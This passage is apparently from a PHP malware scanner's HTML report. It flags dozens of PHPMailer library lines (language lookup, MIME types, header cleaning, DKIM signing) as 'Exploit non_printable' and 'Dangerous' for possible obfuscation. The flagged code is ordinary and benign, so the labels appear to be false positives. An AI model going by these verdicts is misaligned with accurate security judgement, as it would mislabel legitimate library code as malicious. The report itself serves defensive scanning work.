</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
